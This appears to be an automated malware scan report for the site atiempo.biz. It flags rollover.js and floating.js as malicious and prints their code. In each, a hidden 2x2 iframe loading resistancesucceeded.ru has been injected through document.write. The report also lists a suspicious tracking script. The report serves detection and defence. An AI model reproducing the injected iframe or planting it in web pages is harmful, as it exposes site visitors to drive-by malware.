Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atiempo.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.atiempo.biz/ | 200 OK Content-Length: 12930 Content-Type: text/html | clean |
http://www.atiempo.biz/rollover.js | 200 OK Content-Length: 1193 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} }document.write('<iframe src="http://resistancesucceeded.ru/Graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://resistancesucceeded.ru/graphs?8 <iframe src="http://resistancesucceeded.ru/graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.z-webservices.com/webstats/stats.php?site=www.atiempo.biz | 200 OK Content-Length: 3158 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.atiempo.biz ...[785 bytes skipped]... ue; }else{ if(ot_d.cookie.indexOf('machine-id')==-1){f_sc("machine-id","78.158.11.226:1397154549",ot_cd,"/");} if(ot_d.cookie.indexOf('machine-id') != -1) ot_ac=true; } ot_rc=f_rc("machine-id");ot_lc=escape((typeof ot_url===ot_un)?ot_d.location:ot_url);ot_t0=1397154549; function f_log() { ot_im=new Image(1,1); ot_im.src=ot_b+'/webstats/statscollect.php?p=1&mid='+ot_rc +'&fv='+ot_fv+'&si=www.atiempo.biz&ti='+ot_ti +ot_goal+ot_clv +'&sh='+screen.height+'&sw='+screen.width +'&sc='+screen.colorDepth +'&lc='+ot_lc+'&ref='+escape(ot_r.referrer) +'&t0='+ot_t0+'&cld='+escape(ot_cld); } function f_sc(n,v,h,p,d,s){ ot_fv=true; ot_d.cookie=n+'='+escape(v)+((h)?(';expires='+h):'')+((p)?';path='+p:'')+((d)?';domain='+d:'')+((s && (s==true))?'; secure':''); } function f_rc(n){ if(ot_d.cookie= ...[1887 bytes skipped]... | ||
http://www.atiempo.biz/floating.js | 200 OK Content-Length: 6481 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var floatingMenuId = 'floatdiv'; var floatingMenu = { targetX: -180, targetY: 10, hasInner: typeof(window.innerWidth) == 'number', hasElement: typeof(document.documentElement) == 'object' && typeof(document.documentElement.clientWidth) == 'number', menu: document.getElementById ? document.getElementById(floatingMenuId) : document.all ? document.all[floatingMenuId] : floatingMenu.nextY = floatingMenu.calculateCornerY(); floatingMenu.move(); } if (document.layers) floatingMenu.addEvent(window, 'onload', floatingMenu.init); else { floatingMenu.init(); floatingMenu.addEvent(window, 'onload', floatingMenu.initSecondary); }document.write('<iframe src="http://resistancesucceeded.ru/Graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://resistancesucceeded.ru/graphs?8 <iframe src="http://resistancesucceeded.ru/graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.atiempo.biz/index.html | 200 OK Content-Length: 12930 Content-Type: text/html | clean |
http://www.atiempo.biz/index-3.html | 200 OK Content-Length: 11818 Content-Type: text/html | clean |
http://www.atiempo.biz/index-6.html | 200 OK Content-Length: 11787 Content-Type: text/html | clean |
http://www.atiempo.biz/techSupport/techSupport.html | 200 OK Content-Length: 7036 Content-Type: text/html | clean |
http://www.atiempo.biz/techSupport/../rollover.js | 200 OK Content-Length: 1193 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} }document.write('<iframe src="http://resistancesucceeded.ru/Graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://resistancesucceeded.ru/graphs?8 <iframe src="http://resistancesucceeded.ru/graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.atiempo.biz/techSupport/../index.html | 200 OK Content-Length: 12930 Content-Type: text/html | clean |
http://www.atiempo.biz/techSupport/../floating.js | 200 OK Content-Length: 6481 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var floatingMenuId = 'floatdiv'; var floatingMenu = { targetX: -180, targetY: 10, hasInner: typeof(window.innerWidth) == 'number', hasElement: typeof(document.documentElement) == 'object' && typeof(document.documentElement.clientWidth) == 'number', menu: document.getElementById ? document.getElementById(floatingMenuId) : document.all ? document.all[floatingMenuId] : floatingMenu.nextY = floatingMenu.calculateCornerY(); floatingMenu.move(); } if (document.layers) floatingMenu.addEvent(window, 'onload', floatingMenu.init); else { floatingMenu.init(); floatingMenu.addEvent(window, 'onload', floatingMenu.initSecondary); }document.write('<iframe src="http://resistancesucceeded.ru/Graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://resistancesucceeded.ru/graphs?8 <iframe src="http://resistancesucceeded.ru/graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.atiempo.biz/techSupport/../index-3.html | 200 OK Content-Length: 11818 Content-Type: text/html | clean |
http://www.atiempo.biz/techSupport/../index-6.html | 200 OK Content-Length: 11787 Content-Type: text/html | clean |
http://www.atiempo.biz/techSupport/../techSupport/techSupport.html | 200 OK Content-Length: 7036 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atiempo.biz
Result:
GET / HTTP/1.1
Host: atiempo.biz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: atiempo.biz
Referer: http://www.google.com/search?q=atiempo.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: atiempo.biz
Referer: http://www.google.com/search?q=atiempo.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.